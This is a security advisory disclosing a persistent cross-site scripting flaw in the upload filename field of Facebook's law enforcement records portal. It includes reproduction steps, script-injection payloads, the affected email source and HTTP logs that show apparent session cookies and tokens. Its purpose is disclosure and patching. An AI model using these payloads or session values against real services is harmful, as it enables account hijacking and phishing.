Facebook (Law Enforcement) - Persistent Vulnerability

Document Title:
===============
Facebook (Law Enforcement) - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1767


Release Date:
=============
2016-09-30


Vulnerability Laboratory ID (VL-ID):
====================================
1767


Common Vulnerability Scoring System:
====================================
3.8


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Facebook is a corporation and online social networking service headquartered in Menlo Park, California, in the United States. Its website was launched on 
February 4, 2004, by Mark Zuckerberg with his Harvard College roommates and fellow students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris 
Hughes. The founders had initially limited the websites membership to Harvard students, but later expanded it to colleges in the Boston area, the Ivy 
League, and Stanford University. It gradually added support for students at various other universities and later to high-school students. Since 2006, 
anyone who is at least 13 years old was allowed to become a registered user of the website, though the age requirement may be higher depending on 
applicable local laws. Its name comes from the face book directories often given to American university students.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Facebook )

These operational guidelines are for law enforcement officials seeking records from Facebook. For private party requests, including requests from civil 
litigants and criminal defendants, visit: facebook.com/help/?page=1057. Users seeking information on their own accounts can access Facebook’s “Download 
Your Information” feature from their account settings. See facebook.com/help/?page=18830. This information may change at any time.

(Copy of the Homepage: https://www.facebook.com/safety/groups/law/guidelines/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side mail encoding web vulnerability in the official Facebook Law Enforcement online service web-application.


Vulnerability Disclosure Timeline:
==================================
2016-10-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official Facebook Law Enforcement online service web-application.
The vulnerability allows remote attacker to inject own malicious script codes on the application-side of the vulnerable service or module context.

The vulnerability is located in the `filename` value of the picture/file upload in the `Records Request` module. The validatio procedure of the POST 
method request in the `records/x/case/` function allows to inject malicious script codes. After the inject the law enforcement operator of the fbi querys 
the document in the mime attachment (header) after an issue is submit and resend the context to the sender email. Thus context is not secure parsed or 
encoded in the emails context. Thus allows an attacker to inject malicious persistent script codes to the outgoing emails of `records.facebook.com`.

Normally the email context with the filename value needs to be encoded in case of the law enforcement reply that is send as copy via email. The encoding 
is broken and allows an execution of malicious injected script codes in the `mimeAttachmentHeaderName`. Only the filename values are displayed under the 
email context as copy of the stored database management system input. Not only the encoding of the reply email is broken on the encode, it looks also that 
the already arriving email impact an executable vector that needs to be approved internally to patch the issue finally.

The security risk of the application-side input web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. 
Exploitation of the persistent web vulnerability requires a low privileged facebook law enforcement account with restricted access and low or medium user interaction. 
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and 
application-side manipulation of affected or connected module context.

Request Method(s):
				[+] POST

Vulnerable Input(s)
				[+] Documentation (File Upload)

Vulnerable Parameter(s):
				[+] filename as (mimeAttachmentHeaderName)

Affected Module(s):
				[+] records.facebook.com - Email Notify & Copy


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged web-application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Register with the law enforcement web-application
2. Attach a http session tamper like tamper data, http headers or burp suite
3. Open the x/case module (https://www.facebook.com/records/x/case/)
4. Include random existing values and load a picture inside the upload path
5. Start the session tamper for the http protocol and click the submit button to save the entry for a request validation
6. Inject to the filename value of the add form POST method request your own script code payload
7. Continue the request and wait for the 200OK reply of the web-server
8. After the message "Successful Submit" you can close the account
9. Open the mailbox and wait for the reply arrival with html code inside the mimeAttachmentHeaderName
10. The mail arrived and the payload executes in the mimeAttachmentHeaderName section of the email with the copy attachment
11. Successful reproduce of the application-side mail encoding web vulnerability in the law enforcement web-application of facebook!


PoC: Payloads
<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png
<img src=x onerror=prompt("PENTESTFBOOK");>
<iframe src=a>%20<iframe>2.png


PoC: Vulnerable Source (eMail)
Thank you,
Law Enforcement Response Team
---
NOTICE: This email (including any attachments) may contain information that is private, confidential, or protected by attorney-client or other privilege. 
Unless you are the intended recipient, you may not use, copy, or retransmit the email or its contents.

For more information please visit: <a class="moz-txt-link-freetext" href="https://www.facebook.com/safety/groups/law/guidelines/">https://www.facebook.com/safety/groups/law/guidelines/</a> 
</pre></div><BR><FIELDSET CLASS="mimeAttachmentHeader">
<LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=evil.source>>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/>
<P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.2&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P><BR><FIELDSET CLASS="mimeAttachmentHeader"><LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/><P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.3&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P><BR><FIELDSET CLASS="mimeAttachmentHeader"><LEGEND CLASS="mimeAttachmentHeaderName"><img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]</LEGEND></FIELDSET><BR/><P><CENTER><IMG CLASS="moz-attached-image" shrinktofit="yes" SRC="imap-message://admin%40evolution-sec%[email protected]/INBOX#21121?header=saveas&part=1.4&type=image/png&filename=<img src=x onerror=prompt("PENTESTFBOOK");><iframe src=a>%20<iframe>2.png[PERSISTENT SCRIPT CODE EXECUTION!]"></CENTER><P></body>
</html>


--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST https://www.facebook.com/records/x/case/send/731924/?__pc=EXP1%3ADEFAULT&__user=100001940496405&__a=1&__dyn=7AzHK5lyEogDxyKHzGgnyp8doyGzEyeArWo8pojByUW3F6xybxu13wIwYxZi28cWwADKuEjwKze78dUO3K5Vqxm2Pwgolw&__req=7&fb_dtsg=AQEHDmx7wF4G
%3AAQGzmhEPkS02&ttstamp=2658169726810912055119705271586581711221091046980107834850&__rev=2198838 Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime Type[application/x-javascript]
Request Header:
      Host[www.facebook.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
	Accept-Encoding[gzip, deflate, br]
      Referer[https://www.facebook.com/records/x/case/731924/]
      Content-Length[1691]
      Content-Type[multipart/form-data; boundary=---------------------------3867324226368]
      Cookie
[lp=WVZYdXVnWWJrTW0wbWdWzuSQ7QyNPtPa-1U0mhe-aOMd88ie7bPIyGmXM6UAAA; datr=TcfOVtlvXJbBSbTfOugSOlWj; c_user=100001940496405; fr=04dYLQHkFoDZoE5DJ.AWUhBsIOZVX9x78J7bt2Lev2irM.BWzsfS.hc.FbO.0.AWXNw4Y_; xs=9%3An5Zz2GnvrtzlIQ
%3A2%3A1456392145%3A3802; csm=2; s=Aa71wz9bptT4vSNS.BWzsfS; pl=n; lu=RhEUCTQlmd24A8j8ztqbqNVw; p=-2; a11y=%7B%22sr%22%3A0%2C%22sr-ts%22%3A1456392145134%2C%22jk%22%3A0%2C%22jk-ts%22%3A1456392145134%2C%22kb%22%3A1%2C%22kb-ts
%22%3A1456392145134%2C%22hcm%22%3A0%2C%22hcm-ts%22%3A1456392145134%7D; act=1456395897902%2F6; 
presence=EDvF3EtimeF1456395917EuserFA21B01940496405A2EstateFDt2F_5b_5dElm2FnullEuct2F1456393960328EtrFA2loadA2EtwF2551571863EatF1456395816948G456395917033CEchFDp_5f1B01940496405F29CC; wd=1920x875]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3867324226368
Content-Disposition: form-data; name="fb_dtsg"
AQEHDmx7wF4G:AQGzmhEPkS02
-----------------------------3867324226368
Content-Disposition: form-data; name="correspondence"
abc<img src=x onerror=prompt(23);><iframe src=evil.source>%20<iframe>
-----------------------------3867324226368
Content-Disposition: form-data; name="documents[]"; filename="abc<img src=x onerror=prompt(23);><iframe src=evil.source>>%20<iframe>2.png[PERSISTENT SCRIPT CODE INJECT VIA POST!]"
Content-Type: image/png
-
Status: 200[OK]
POST https://www.facebook.com/ajax/bz Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime Type[application/x-javascript]
   Request Header:
      Host[www.facebook.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.facebook.com/records/x/settings/]
      Content-Length[1708]
      Cookie[datr=TcfOVtlvXJbBSbTfOugSOlWj; c_user=100001940496405; 
fr=04dYLQHkFoDZoE5DJ.AWUhBsIOZVX9x78J7bt2Lev2irM.BWzsfS.hc.FbO.0.AWXNw4Y_; xs=9%3An5Zz2GnvrtzlIQ%3A2%3A1456392145%3A3802; csm=2; s=Aa71wz9bptT4vSNS.BWzsfS; pl=n; lu=RhEUCTQlmd24A8j8ztqbqNVw; p=-2; a11y=%7B%22sr%22%3A0%2C%22sr-ts
%22%3A1456392145134%2C%22jk%22%3A0%2C%22jk-ts%22%3A1456392145134%2C%22kb%22%3A1%2C%22kb-ts%22%3A1456392145134%2C%22hcm%22%3A0%2C%22hcm-ts%22%3A1456392145134%7D; act=1456396112742%2F12; 
presence=EDvF3EtimeF1456395917EuserFA21B01940496405A2EstateFDt2F_5b_5dElm2FnullEuct2F1456393960328EtrFA2loadA2EtwF2551571863EatF1456395816948G456395917033CEchFDp_5f1B01940496405F29CC; wd=1920x875; x-src=%2Frecords%2Fx%2Fsettings%2F
%7Ccontent]
      Connection[keep-alive]
   POST-Daten:
      __a[1]
      __dyn[7AmajEzURoG649UoHaEWC5ECiq2W8GAdy8VdLFwxBxembzEeAq68K5UcU-2CEf8vkwy3eEjx2uVWxe6okze48K3ucDwPK4VqCzEbe7898lw]
      __req[c]
      __rev[2198838]
      __user[100001940496405]
      fb_dtsg[AQEHDmx7wF4G%3AAQGzmhEPkS02]
      ph[V3]
      q[%5B%7B%22user%22%3A%22100001940496405%22%2C%22page_id%22%3A%225rcjz6%22%2C%22posts%22%3A%5B%5B%22time_spent_bit_array%22%2C%7B%22tos_id%22%3A%225rcjz6%22%2C
%22start_time%22%3A1456395943%2C%22tos_array%22%3A%5B1559039%2C1071769328%5D%2C%22tos_len%22%3A64%2C%22tos_seq%22%3A1%2C%22tos_cum%22%3A39%7D%2C1456396007617%2C1%5D%2C%5B%22time_spent_bit_array%22%2C%7B%22tos_id%22%3A%225rcjz6%22%2C
%22start_time%22%3A1456396034%2C%22tos_array%22%3A%5B1074381055%2C261953%5D%2C%22tos_len%22%3A64%2C%22tos_seq%22%3A2%2C%22tos_cum%22%3A64%7D%2C1456396098374%2C1%5D%2C%5B%22click_ref_logger%22%2C%5B%220Q0J%22%2C1456396108048%2C%22act
%22%2C1456396108046%2C8%2C%22https%3A%2F%2Fwww.facebook.com%2Frecords%2Fx%2Fsettings%2F%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Frecords%2Fx%2Fcase%2F731924%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D
%2C1420%2C304%2C10%2C1883%2C%225rcjz6%22%2C%22XLawEnforcementPortalViewCaseController%22%5D%2C1456396108048%2C1%5D%2C%5B%22click_ref_logger%22%2C%5B%220Q0J%22%2C1456396112743%2C%22act%22%2C1456396112742%2C12%2C%22https%3A%2F
%2Fwww.facebook.com%2Frecords%2Fx%2Fsettings%2F%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Frecords%2Fx%2Fsettings%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C1400%2C304%2C10%2C1883%2C%225rcjz6%22%2C
%22XLawEnforcementPortalViewCaseController%22%5D%2C1456396112743%2C0%5D%5D%2C%22trigger%22%3A%22click_ref_logger%22%7D%5D]
      ts[1456396112765]
      ttstamp[2658169726810912055119705271586581711221091046980107834850]
Response Header:
      X-Frame-Options[DENY]
      Cache-Control[private, no-cache, no-store, must-revalidate]
      Expires[Sat, 01 Jan 2000 00:00:00 GMT]
      content-security-policy[default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' fbstatic-a.akamaihd.net fbcdn-static-b-a.akamaihd.net *.atlassolutions.com blob:;style-src * 'unsafe-inline' data:;connect-src *.facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* *.akamaihd.net wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com blob:;]
      Access-control-allow-credentials[true]
      p3p[CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"]
      Strict-Transport-Security[max-age=15552000; preload]
      Pragma[no-cache]
      Vary[Origin, Accept-Encoding]
      access-control-allow-origin[https://www.facebook.com]
      Access-Control-Expose-Headers[X-FB-Debug]
      public-key-pins-report-only[max-age=500; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="q4PO2G2cbkZhZ82+JgmRUyGMoAeozA+BSXVXQWB8XWQ="; report-uri="http://reports.fb.com/hpkp/"]
      access-control-allow-method[, OPTIONS]
      X-XSS-Protection[0]
      Content-Type[application/x-javascript; charset=utf-8]
      x-content-type-options[nosniff]
      Set-Cookie[wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1456396116; path=/; domain=.facebook.com; httponly]
      Content-Encoding[gzip]
      X-FB-Debug[+ZpWXXD1NWrARFtYBT2IzkpHssd/fJxzATuT8eq64tr+NEEMUkIzlq5E+q7hiqKZ6JoRa5U5wLf4d3ck83kNEw==]
      X-Firefox-Spdy[h2]


Account(s): Facebook Law Enforcement
[email protected]
[email protected]


Reference(s):
https://www.facebook.com/records/x/case/732871/
https://www.facebook.com/records/x/case/731924/
https://www.facebook.com/records/x/settings/
https://www.facebook.com/ajax/bz


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and restriction of the filename value in the `upload`POST method request.
Encode and filter the outgoing email of records.facebook.com with the vulnerable `mimeAttachmentHeaderName` parameter 
to prevent persistent script code injection attacks.
Setup a secure exception that captures the invalid request on upload and redirects the user to the encoded form values again.  


Security Risk:
==============
The security risk of the persistent mail encoding vulnerability in the filename value of the facebook law enforcement web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™